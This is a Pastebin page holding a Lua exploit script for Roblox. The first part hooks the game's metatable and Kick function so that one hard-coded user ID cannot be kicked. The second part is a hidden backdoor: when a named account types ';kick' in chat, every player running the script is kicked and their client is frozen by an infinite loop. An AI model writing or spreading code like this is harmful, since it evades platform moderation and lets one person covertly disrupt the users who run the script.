Advertisement
ERROR_CODE

Untitled

Nov 12th, 2024 (edited)
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.09 KB | None | 0 0
  1. spawn(function()
  2. if game.Players.LocalPlayer.UserId == 3323558881 then
  3. local mt = getrawmetatable(game)
  4.  local old = mt.__namecall
  5.  local protect = newcclosure or protect_function
  6.  
  7.  if not protect then
  8.   notify("Incompatible Exploit Warning", "Your exploit does not support protection against stack trace errors, resulting to fallback function")
  9.   protect = function(f) return f end
  10.  end
  11.  
  12.  setreadonly(mt, false)
  13.  mt.__namecall = protect(function(self, ...)
  14.   local method = getnamecallmethod()
  15.   if method == "Kick" then
  16.    wait(9e9)
  17.    return
  18.   end
  19.   return old(self, ...)
  20.  end)
  21.  hookfunction(Players.LocalPlayer.Kick,protect(function() wait(9e9) end))
  22. end
  23. local Players = game:GetService("Players")
  24. local function checkForPlayer()
  25. for _, player in pairs(Players:GetPlayers()) do
  26. if player.Name == "arseni_tge3" then
  27. game.Players.arseni_tge3.Chatted:connect(function(cht)
  28. if cht:match(";kick") then
  29. game.Players.LocalPlayer:Kick("You got kicked.")
  30. wait(0.5)
  31. while true do end
  32. end
  33. end)
  34. return
  35. end
  36. end
  37. end
  38. spawn(function()
  39. while wait() do
  40. checkForPlayer()
  41. end
  42. end)
  43. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement